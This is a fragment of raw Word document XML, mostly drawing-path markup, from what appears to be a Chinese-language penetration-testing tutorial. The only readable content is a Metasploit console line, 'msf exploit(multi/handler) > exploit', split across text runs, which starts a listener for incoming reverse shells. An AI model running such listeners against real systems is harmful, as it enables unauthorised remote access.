        <w:t> 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Wildcard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="119"/>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="119"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Target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8.874pt;margin-top:49.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,997" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:997;width:82;height:322" coordorigin="1177,997" coordsize="82,322" path="m1217,1000l1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1001,1217,1001,1217,1001,1217,1001,1217,1001,1217,1002,1217,1002,1217,1002,1217,1003,1217,1003,1217,1004,1217,1004,1217,1005,1217,1005,1217,1006,1217,1006,1217,1007,1217,1008,1217,1008,1217,1009,1217,1010,1217,1011,1217,1011,1217,1012,1217,1013,1217,1014,1217,1015,1217,1017,1217,1018,1217,1019,1217,1020,1217,1022,1217,1023,1217,1024,1217,1026,1217,1027,1217,1029,1217,1031,1217,1032,1217,1034,1217,1036,1217,1038,1217,1040,1217,1042,1217,1044,1217,1046,1217,1049,1217,1051,1217,1053,1217,1056,1217,1058,1217,1061,1217,1064,1217,1066,1217,1069,1217,1072,1217,1075,1217,1078,1217,1082,1217,1085,1217,1088,1217,1092,1217,1095,1217,1099,1217,1103,1217,1106,1217,1110,1217,1114,1217,1118,1217,1123,1217,1127,1217,1131,1217,1136,1217,1140,1217,1145,1217,1150,1217,1155,1217,1160,1217,1165,1217,1170,1217,1176,1217,1181,1217,1187,1217,1192,1217,1198,1217,1204,1217,1210,1217,1216,1217,1222,1217,1229,1217,1235,1217,1242,1217,1248,1217,1255,1217,1262,1217,1269,1217,1277,1217,1284,1217,1291,1217,1299,1217,1307,1217,1315e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:64.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,1297" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:1297;width:82;height:322" coordorigin="1177,1297" coordsize="82,322" path="m1217,1315l1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1315,1217,1316,1217,1316,1217,1316,1217,1316,1217,1316,1217,1317,1217,1317,1217,1317,1217,1317,1217,1318,1217,1318,1217,1319,1217,1319,1217,1319,1217,1320,1217,1320,1217,1321,1217,1322,1217,1322,1217,1323,1217,1324,1217,1324,1217,1325,1217,1326,1217,1327,1217,1328,1217,1329,1217,1330,1217,1331,1217,1332,1217,1333,1217,1334,1217,1336,1217,1337,1217,1338,1217,1340,1217,1341,1217,1343,1217,1344,1217,1346,1217,1348,1217,1349,1217,1351,1217,1353,1217,1355,1217,1357,1217,1359,1217,1361,1217,1364,1217,1366,1217,1368,1217,1371,1217,1373,1217,1376,1217,1378,1217,1381,1217,1384,1217,1387,1217,1390,1217,1393,1217,1396,1217,1399,1217,1402,1217,1406,1217,1409,1217,1413,1217,1417,1217,1420,1217,1424,1217,1428,1217,1432,1217,1436,1217,1440,1217,1445,1217,1449,1217,1453,1217,1458,1217,1463,1217,1467,1217,1472,1217,1477,1217,1482,1217,1487,1217,1493,1217,1498,1217,1504,1217,1509,1217,1515,1217,1521,1217,1527,1217,1533,1217,1539,1217,1545,1217,1552,1217,1558,1217,1565,1217,1572,1217,1579,1217,1586,1217,1593,1217,1600,1217,1607,1217,1615e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:552.874pt;width:4.125pt;height:46.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11057" coordsize="82,922">
        <v:shape style="position:absolute;left:1177;top:11057;width:82;height:922" coordorigin="1177,11057" coordsize="82,922" path="m1217,11070l1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11070,1217,11071,1217,11071,1217,11071,1217,11071,1217,11072,1217,11072,1217,11073,1217,11073,1217,11074,1217,11075,1217,11075,1217,11076,1217,11077,1217,11078,1217,11079,1217,11080,1217,11081,1217,11083,1217,11084,1217,11085,1217,11087,1217,11089,1217,11091,1217,11092,1217,11095,1217,11097,1217,11099,1217,11101,1217,11104,1217,11106,1217,11109,1217,11112,1217,11115,1217,11118,1217,11122,1217,11125,1217,11129,1217,11132,1217,11136,1217,11140,1217,11145,1217,11149,1217,11154,1217,11158,1217,11163,1217,11169,1217,11174,1217,11179,1217,11185,1217,11191,1217,11197,1217,11203,1217,11210,1217,11216,1217,11223,1217,11230,1217,11238,1217,11245,1217,11253,1217,11261,1217,11269,1217,11277,1217,11286,1217,11295,1217,11304,1217,11314,1217,11323,1217,11333,1217,11343,1217,11354,1217,11364,1217,11375,1217,11386,1217,11398,1217,11409,1217,11421,1217,11434,1217,11446,1217,11459,1217,11472,1217,11486,1217,11499,1217,11513,1217,11528,1217,11542,1217,11557,1217,11572,1217,11588,1217,11604,1217,11620,1217,11637,1217,11653,1217,11671,1217,11688,1217,11706,1217,11724,1217,11743,1217,11762,1217,11781,1217,11800,1217,11820,1217,11841,1217,11861,1217,11882,1217,11904,1217,11925,1217,11948,1217,11970e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:597.874pt;width:4.125pt;height:31.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11957" coordsize="82,622">
        <v:shape style="position:absolute;left:1177;top:11957;width:82;height:622" coordorigin="1177,11957" coordsize="82,622" path="m1217,11970l1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11970,1217,11971,1217,11971,1217,11971,1217,11971,1217,11971,1217,11971,1217,11972,1217,11972,1217,11972,1217,11973,1217,11973,1217,11974,1217,11974,1217,11975,1217,11976,1217,11976,1217,11977,1217,11978,1217,11979,1217,11980,1217,11981,1217,11982,1217,11983,1217,11984,1217,11985,1217,11987,1217,11988,1217,11990,1217,11991,1217,11993,1217,11995,1217,11996,1217,11998,1217,12000,1217,12002,1217,12005,1217,12007,1217,12009,1217,12012,1217,12015,1217,12017,1217,12020,1217,12023,1217,12026,1217,12029,1217,12033,1217,12036,1217,12040,1217,12043,1217,12047,1217,12051,1217,12055,1217,12059,1217,12063,1217,12068,1217,12072,1217,12077,1217,12082,1217,12087,1217,12092,1217,12098,1217,12103,1217,12109,1217,12114,1217,12120,1217,12126,1217,12133,1217,12139,1217,12146,1217,12152,1217,12159,1217,12166,1217,12174,1217,12181,1217,12189,1217,12197,1217,12205,1217,12213,1217,12221,1217,12230,1217,12238,1217,12247,1217,12257,1217,12266,1217,12275,1217,12285,1217,12295,1217,12305,1217,12316,1217,12326,1217,12337,1217,12348,1217,12359,1217,12371,1217,12382,1217,12394,1217,12406,1217,12419,1217,12431,1217,12444,1217,12457,1217,12471,1217,12484,1217,12498,1217,12512,1217,12526,1217,12541,1217,12555,1217,12570e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:627.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,12557" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:12557;width:82;height:322" coordorigin="1177,12557" coordsize="82,322" path="m1217,12570l1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12570,1217,12571,1217,12571,1217,12571,1217,12571,1217,12571,1217,12571,1217,12571,1217,12571,1217,12571,1217,12572,1217,12572,1217,12572,1217,12572,1217,12573,1217,12573,1217,12573,1217,12573,1217,12574,1217,12574,1217,12575,1217,12575,1217,12576,1217,12576,1217,12577,1217,12577,1217,12578,1217,12579,1217,12579,1217,12580,1217,12581,1217,12582,1217,12583,1217,12584,1217,12584,1217,12586,1217,12587,1217,12588,1217,12589,1217,12590,1217,12591,1217,12593,1217,12594,1217,12595,1217,12597,1217,12598,1217,12600,1217,12602,1217,12603,1217,12605,1217,12607,1217,12609,1217,12611,1217,12613,1217,12615,1217,12617,1217,12619,1217,12622,1217,12624,1217,12626,1217,12629,1217,12631,1217,12634,1217,12637,1217,12640,1217,12643,1217,12645,1217,12649,1217,12652,1217,12655,1217,12658,1217,12662,1217,12665,1217,12669,1217,12672,1217,12676,1217,12680,1217,12684,1217,12688,1217,12692,1217,12696,1217,12700,1217,12705,1217,12709,1217,12714,1217,12718,1217,12723,1217,12728,1217,12733,1217,12738,1217,12743,1217,12748,1217,12754,1217,12759,1217,12765,1217,12771,1217,12777,1217,12782,1217,12789,1217,12795,1217,12801,1217,12807,1217,12814,1217,12821,1217,12827,1217,12834,1217,12841,1217,12848,1217,12856,1217,12863,1217,12870e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:642.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,12857" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:12857;width:82;height:322" coordorigin="1177,12857" coordsize="82,322" path="m1217,12870l1217,12870,1217,12870,1217,12870,1217,12870,1217,12870,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12871,1217,12872,1217,12872,1217,12872,1217,12872,1217,12872,1217,12873,1217,12873,1217,12873,1217,12874,1217,12874,1217,12874,1217,12875,1217,12875,1217,12876,1217,12876,1217,12877,1217,12877,1217,12878,1217,12879,1217,12880,1217,12880,1217,12881,1217,12882,1217,12883,1217,12884,1217,12885,1217,12886,1217,12887,1217,12888,1217,12889,1217,12890,1217,12891,1217,12893,1217,12894,1217,12896,1217,12897,1217,12899,1217,12900,1217,12902,1217,12903,1217,12905,1217,12907,1217,12909,1217,12911,1217,12913,1217,12915,1217,12917,1217,12919,1217,12922,1217,12924,1217,12926,1217,12929,1217,12932,1217,12934,1217,12937,1217,12940,1217,12943,1217,12946,1217,12949,1217,12952,1217,12955,1217,12958,1217,12962,1217,12965,1217,12969,1217,12972,1217,12976,1217,12980,1217,12984,1217,12988,1217,12992,1217,12996,1217,13000,1217,13005,1217,13009,1217,13014,1217,13018,1217,13023,1217,13028,1217,13033,1217,13038,1217,13043,1217,13049,1217,13054,1217,13060,1217,13065,1217,13071,1217,13077,1217,13083,1217,13089,1217,13095,1217,13101,1217,13108,1217,13114,1217,13121,1217,13127,1217,13134,1217,13141,1217,13149,1217,13156,1217,13163,1217,13171e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:657.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13157" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13157;width:82;height:322" coordorigin="1177,13157" coordsize="82,322" path="m1217,13171l1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13171,1217,13172,1217,13172,1217,13172,1217,13172,1217,13172,1217,13173,1217,13173,1217,13173,1217,13173,1217,13174,1217,13174,1217,13175,1217,13175,1217,13175,1217,13176,1217,13176,1217,13177,1217,13178,1217,13178,1217,13179,1217,13180,1217,13180,1217,13181,1217,13182,1217,13183,1217,13184,1217,13185,1217,13186,1217,13187,1217,13188,1217,13189,1217,13190,1217,13192,1217,13193,1217,13194,1217,13196,1217,13197,1217,13199,1217,13200,1217,13202,1217,13204,1217,13205,1217,13207,1217,13209,1217,13211,1217,13213,1217,13215,1217,13217,1217,13220,1217,13222,1217,13224,1217,13227,1217,13229,1217,13232,1217,13234,1217,13237,1217,13240,1217,13243,1217,13246,1217,13249,1217,13252,1217,13255,1217,13258,1217,13262,1217,13265,1217,13269,1217,13272,1217,13276,1217,13280,1217,13284,1217,13288,1217,13292,1217,13296,1217,13300,1217,13305,1217,13309,1217,13314,1217,13319,1217,13323,1217,13328,1217,13333,1217,13338,1217,13343,1217,13349,1217,13354,1217,13360,1217,13365,1217,13371,1217,13377,1217,13383,1217,13389,1217,13395,1217,13401,1217,13408,1217,13414,1217,13421,1217,13428,1217,13435,1217,13442,1217,13449,1217,13456,1217,13463,1217,13471e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:672.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13457" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13457;width:82;height:322" coordorigin="1177,13457" coordsize="82,322" path="m1217,13471l1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13471,1217,13472,1217,13472,1217,13472,1217,13472,1217,13472,1217,13472,1217,13473,1217,13473,1217,13473,1217,13474,1217,13474,1217,13474,1217,13475,1217,13475,1217,13476,1217,13476,1217,13477,1217,13477,1217,13478,1217,13478,1217,13479,1217,13480,1217,13481,1217,13481,1217,13482,1217,13483,1217,13484,1217,13485,1217,13486,1217,13487,1217,13488,1217,13489,1217,13490,1217,13492,1217,13493,1217,13494,1217,13496,1217,13497,1217,13499,1217,13500,1217,13502,1217,13504,1217,13506,1217,13507,1217,13509,1217,13511,1217,13513,1217,13515,1217,13517,1217,13520,1217,13522,1217,13524,1217,13527,1217,13529,1217,13532,1217,13535,1217,13537,1217,13540,1217,13543,1217,13546,1217,13549,1217,13552,1217,13555,1217,13559,1217,13562,1217,13565,1217,13569,1217,13573,1217,13576,1217,13580,1217,13584,1217,13588,1217,13592,1217,13596,1217,13601,1217,13605,1217,13609,1217,13614,1217,13619,1217,13623,1217,13628,1217,13633,1217,13638,1217,13644,1217,13649,1217,13654,1217,13660,1217,13665,1217,13671,1217,13677,1217,13683,1217,13689,1217,13695,1217,13701,1217,13708,1217,13714,1217,13721,1217,13728,1217,13735,1217,13742,1217,13749,1217,13756,1217,13763,1217,13771e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:687.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13757" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13757;width:82;height:322" coordorigin="1177,13757" coordsize="82,322" path="m1217,13771l1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13771,1217,13772,1217,13772,1217,13772,1217,13772,1217,13772,1217,13772,1217,13773,1217,13773,1217,13773,1217,13773,1217,13774,1217,13774,1217,13774,1217,13775,1217,13775,1217,13776,1217,13776,1217,13777,1217,13777,1217,13778,1217,13779,1217,13779,1217,13780,1217,13781,1217,13782,1217,13782,1217,13783,1217,13784,1217,13785,1217,13786,1217,13787,1217,13788,1217,13789,1217,13791,1217,13792,1217,13793,1217,13795,1217,13796,1217,13797,1217,13799,1217,13801,1217,13802,1217,13804,1217,13806,1217,13808,1217,13809,1217,13811,1217,13813,1217,13815,1217,13818,1217,13820,1217,13822,1217,13825,1217,13827,1217,13829,1217,13832,1217,13835,1217,13837,1217,13840,1217,13843,1217,13846,1217,13849,1217,13852,1217,13855,1217,13859,1217,13862,1217,13866,1217,13869,1217,13873,1217,13877,1217,13880,1217,13884,1217,13888,1217,13892,1217,13897,1217,13901,1217,13905,1217,13910,1217,13914,1217,13919,1217,13924,1217,13929,1217,13933,1217,13939,1217,13944,1217,13949,1217,13954,1217,13960,1217,13966,1217,13971,1217,13977,1217,13983,1217,13989,1217,13995,1217,14002,1217,14008,1217,14015,1217,14021,1217,14028,1217,14035,1217,14042,1217,14049,1217,14056,1217,14064,1217,14071e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:702.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14057" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14057;width:82;height:322" coordorigin="1177,14057" coordsize="82,322" path="m1217,14071l1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14071,1217,14072,1217,14072,1217,14072,1217,14072,1217,14072,1217,14072,1217,14073,1217,14073,1217,14073,1217,14073,1217,14074,1217,14074,1217,14074,1217,14075,1217,14075,1217,14075,1217,14076,1217,14076,1217,14077,1217,14077,1217,14078,1217,14079,1217,14079,1217,14080,1217,14081,1217,14082,1217,14082,1217,14083,1217,14084,1217,14085,1217,14086,1217,14087,1217,14088,1217,14090,1217,14091,1217,14092,1217,14093,1217,14095,1217,14096,1217,14098,1217,14099,1217,14101,1217,14102,1217,14104,1217,14106,1217,14108,1217,14110,1217,14112,1217,14114,1217,14116,1217,14118,1217,14120,1217,14122,1217,14125,1217,14127,1217,14130,1217,14132,1217,14135,1217,14138,1217,14140,1217,14143,1217,14146,1217,14149,1217,14152,1217,14156,1217,14159,1217,14162,1217,14166,1217,14169,1217,14173,1217,14177,1217,14180,1217,14184,1217,14188,1217,14192,1217,14197,1217,14201,1217,14205,1217,14210,1217,14214,1217,14219,1217,14224,1217,14229,1217,14234,1217,14239,1217,14244,1217,14249,1217,14255,1217,14260,1217,14266,1217,14271,1217,14277,1217,14283,1217,14289,1217,14295,1217,14302,1217,14308,1217,14315,1217,14321,1217,14328,1217,14335,1217,14342,1217,14349,1217,14356,1217,14364,1217,14371e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:717.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14357" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14357;width:82;height:322" coordorigin="1177,14357" coordsize="82,322" path="m1217,14371l1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14371,1217,14372,1217,14372,1217,14372,1217,14372,1217,14372,1217,14372,1217,14372,1217,14372,1217,14373,1217,14373,1217,14373,1217,14373,1217,14374,1217,14374,1217,14374,1217,14375,1217,14375,1217,14376,1217,14376,1217,14377,1217,14377,1217,14378,1217,14378,1217,14379,1217,14380,1217,14380,1217,14381,1217,14382,1217,14383,1217,14384,1217,14384,1217,14385,1217,14386,1217,14387,1217,14389,1217,14390,1217,14391,1217,14392,1217,14394,1217,14395,1217,14396,1217,14398,1217,14399,1217,14401,1217,14403,1217,14404,1217,14406,1217,14408,1217,14410,1217,14412,1217,14414,1217,14416,1217,14418,1217,14420,1217,14422,1217,14425,1217,14427,1217,14430,1217,14432,1217,14435,1217,14438,1217,14441,1217,14443,1217,14446,1217,14449,1217,14453,1217,14456,1217,14459,1217,14462,1217,14466,1217,14469,1217,14473,1217,14477,1217,14481,1217,14485,1217,14489,1217,14493,1217,14497,1217,14501,1217,14505,1217,14510,1217,14515,1217,14519,1217,14524,1217,14529,1217,14534,1217,14539,1217,14544,1217,14549,1217,14555,1217,14560,1217,14566,1217,14572,1217,14577,1217,14583,1217,14589,1217,14596,1217,14602,1217,14608,1217,14615,1217,14621,1217,14628,1217,14635,1217,14642,1217,14649,1217,14657,1217,14664,1217,14671e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:732.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14657" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14657;width:82;height:322" coordorigin="1177,14657" coordsize="82,322" path="m1217,14671l1217,14671,1217,14671,1217,14671,1217,14671,1217,14671,1217,14671,1217,14671,1217,14671,1217,14671,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14672,1217,14673,1217,14673,1217,14673,1217,14673,1217,14674,1217,14674,1217,14674,1217,14675,1217,14675,1217,14675,1217,14676,1217,14676,1217,14677,1217,14677,1217,14678,1217,14678,1217,14679,1217,14680,1217,14680,1217,14681,1217,14682,1217,14683,1217,14684,1217,14685,1217,14686,1217,14687,1217,14688,1217,14689,1217,14690,1217,14691,1217,14692,1217,14694,1217,14695,1217,14696,1217,14698,1217,14699,1217,14701,1217,14703,1217,14704,1217,14706,1217,14708,1217,14710,1217,14712,1217,14714,1217,14716,1217,14718,1217,14720,1217,14723,1217,14725,1217,14727,1217,14730,1217,14732,1217,14735,1217,14738,1217,14741,1217,14744,1217,14747,1217,14750,1217,14753,1217,14756,1217,14759,1217,14763,1217,14766,1217,14770,1217,14773,1217,14777,1217,14781,1217,14785,1217,14789,1217,14793,1217,14797,1217,14801,1217,14806,1217,14810,1217,14815,1217,14819,1217,14824,1217,14829,1217,14834,1217,14839,1217,14844,1217,14850,1217,14855,1217,14860,1217,14866,1217,14872,1217,14878,1217,14884,1217,14890,1217,14896,1217,14902,1217,14908,1217,14915,1217,14922,1217,14928,1217,14935,1217,14942,1217,14949,1217,14957,1217,14964,1217,14972e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:747.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14957" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14957;width:82;height:322" coordorigin="1177,14957" coordsize="82,322" path="m1217,14972l1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14972,1217,14973,1217,14973,1217,14973,1217,14973,1217,14973,1217,14974,1217,14974,1217,14974,1217,14975,1217,14975,1217,14975,1217,14976,1217,14976,1217,14977,1217,14977,1217,14978,1217,14979,1217,14979,1217,14980,1217,14981,1217,14981,1217,14982,1217,14983,1217,14984,1217,14985,1217,14986,1217,14987,1217,14988,1217,14989,1217,14990,1217,14991,1217,14992,1217,14994,1217,14995,1217,14997,1217,14998,1217,15000,1217,15001,1217,15003,1217,15005,1217,15006,1217,15008,1217,15010,1217,15012,1217,15014,1217,15016,1217,15018,1217,15020,1217,15023,1217,15025,1217,15028,1217,15030,1217,15033,1217,15035,1217,15038,1217,15041,1217,15044,1217,15047,1217,15050,1217,15053,1217,15056,1217,15059,1217,15063,1217,15066,1217,15070,1217,15073,1217,15077,1217,15081,1217,15085,1217,15089,1217,15093,1217,15097,1217,15101,1217,15106,1217,15110,1217,15115,1217,15119,1217,15124,1217,15129,1217,15134,1217,15139,1217,15144,1217,15150,1217,15155,1217,15161,1217,15166,1217,15172,1217,15178,1217,15184,1217,15190,1217,15196,1217,15202,1217,15209,1217,15215,1217,15222,1217,15229,1217,15235,1217,15242,1217,15250,1217,15257,1217,15264,1217,15272e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:762.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,15257" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:15257;width:82;height:322" coordorigin="1177,15257" coordsize="82,322" path="m1217,15272l1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15272,1217,15273,1217,15273,1217,15273,1217,15273,1217,15273,1217,15274,1217,15274,1217,15274,1217,15274,1217,15275,1217,15275,1217,15276,1217,15276,1217,15277,1217,15277,1217,15278,1217,15278,1217,15279,1217,15279,1217,15280,1217,15281,1217,15281,1217,15282,1217,15283,1217,15284,1217,15285,1217,15286,1217,15287,1217,15288,1217,15289,1217,15290,1217,15291,1217,15293,1217,15294,1217,15295,1217,15297,1217,15298,1217,15300,1217,15301,1217,15303,1217,15305,1217,15306,1217,15308,1217,15310,1217,15312,1217,15314,1217,15316,1217,15318,1217,15321,1217,15323,1217,15325,1217,15328,1217,15330,1217,15333,1217,15335,1217,15338,1217,15341,1217,15344,1217,15347,1217,15350,1217,15353,1217,15356,1217,15360,1217,15363,1217,15366,1217,15370,1217,15374,1217,15377,1217,15381,1217,15385,1217,15389,1217,15393,1217,15397,1217,15402,1217,15406,1217,15410,1217,15415,1217,15420,1217,15424,1217,15429,1217,15434,1217,15439,1217,15445,1217,15450,1217,15455,1217,15461,1217,15466,1217,15472,1217,15478,1217,15484,1217,15490,1217,15496,1217,15502,1217,15509,1217,15515,1217,15522,1217,15529,1217,15536,1217,15543,1217,15550,1217,15557,1217,15564,1217,15572e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:100.800pt;width:467.400pt;height:390.6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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit(multi/handler)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
